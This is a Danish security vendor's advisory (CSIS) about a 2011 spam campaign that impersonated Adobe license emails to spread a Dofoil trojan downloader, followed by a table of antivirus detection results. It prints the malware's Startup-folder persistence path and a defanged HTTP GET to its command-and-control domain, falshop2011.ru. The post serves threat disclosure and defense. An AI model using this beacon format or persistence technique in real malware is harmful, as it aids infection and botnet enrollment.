CSIS Nyheder: Nyt spamrun lokker med licenskode fra Adobe

CSIS har i nat stoppet en sværm af spammails som foregiver at komme fra Adobe og som inkluderer en vedhæftet licens til flere populære og dyre Adobe produkter. Den vedhæftede zip-fil indeholder en .exe fil, som ved kørsel vil inficere maskinen med malware.

Den uønskede e-mail anvender forskelligt indhold i emnelinjen:



En kopi af den komplette spammail findes herunder:


Hvis den vedhæftede fil udpakkes og køres vil den kopiere sig til systemet som:
[%dokumenter%][%brugerprofil%]Start MenuProgramsStartupdxdiag.exe

Det betyder at koden via startup mappen indlæses efter en genstart af maskinen. 

Koden injekter sig samtidig i svchost.exe processen og forbinder sig til en C&C server hvorfra den indruller sig i et BOTnet og henter supplerende malware. Det sker via en HTTP GET, som gengivet herunder (mellemrum indlagt af CSIS)

hxxp://falshop2011.ru/com1/task.php?bid=[%unikt BOTid%]&os=5-1-2600&uptime=0&rnd=228046 HTTP/1.1

Det pågældende domæne er spærret i CSIS Secure DNS, ligesom vi stopper de uønskede e-mails i vores mailfirewall services. Heimdal Pro og Corporate kunder er således også beskyttet mod datalækage.

Den skadelige kode opnår følgende antivirus detektion:

Antivirus     Version     Last Update     Result
AhnLab-V3     2011.11.02.00     2011.11.02     -
AntiVir     7.11.16.253     2011.11.03     -
Antiy-AVL     2.0.3.7     2011.11.03     -
Avast     6.0.1289.0     2011.11.02     -
AVG     10.0.0.1190     2011.11.02     -
BitDefender     7.2     2011.11.03     -
ByteHero     1.0.0.1     2011.09.23     Trojan.Win32.PSW.ay
CAT-QuickHeal     11.00     2011.11.03     -
ClamAV     0.97.3.0     2011.11.03     -
Commtouch     5.3.2.6     2011.11.03     W32/Trojan3.CZZ
Comodo     10646     2011.11.03     -
DrWeb     5.0.2.03300     2011.11.03     -
Emsisoft     5.1.0.11     2011.11.03     -
eSafe     7.0.17.0     2011.11.02     -
eTrust-Vet     36.1.8653     2011.11.02     -
F-Prot     4.6.5.141     2011.11.03     W32/Trojan3.CZZ
F-Secure     9.0.16440.0     2011.11.03     -
Fortinet     4.3.370.0     2011.11.03     -
GData     22     2011.11.03     -
Ikarus     T3.1.1.107.0     2011.11.03     Trojan-Downloader.Win32.Dofoil
Jiangmin     13.0.900     2011.11.02     -
K7AntiVirus     9.116.5379     2011.11.02     -
Kaspersky     9.0.0.837     2011.11.02     -
McAfee     5.400.0.1158     2011.11.03     -
McAfee-GW-Edition     2010.1D     2011.11.03     Heuristic.BehavesLike.Win32.Spyware.F
Microsoft     1.7801     2011.11.02     TrojanDownloader:Win32/Dofoil.D
NOD32     6596     2011.11.03     -
nProtect     2011-11-02.02     2011.11.02     -
Panda     10.0.3.5     2011.11.02     Suspicious file
PCTools     8.0.0.5     2011.11.03     -
Prevx     3.0     2011.11.03     -
Rising     23.82.02.02     2011.11.02     -
Sophos     4.70.0     2011.11.03     Troj/DwnLdr-JLW
SUPERAntiSpyware     4.40.0.1006     2011.11.03     -
Symantec     20111.2.0.82     2011.11.03     -
TheHacker     6.7.0.1.337     2011.11.03     -
TrendMicro     9.500.0.1008     2011.11.03     -
TrendMicro-HouseCall     9.500.0.1008     2011.11.03     -
VBA32     3.12.16.4     2011.11.02     -
VIPRE     10951     2011.11.03     -
ViRobot     2011.11.3.4752     2011.11.03     -
VirusBuster     14.1.42.0     2011.11.02     -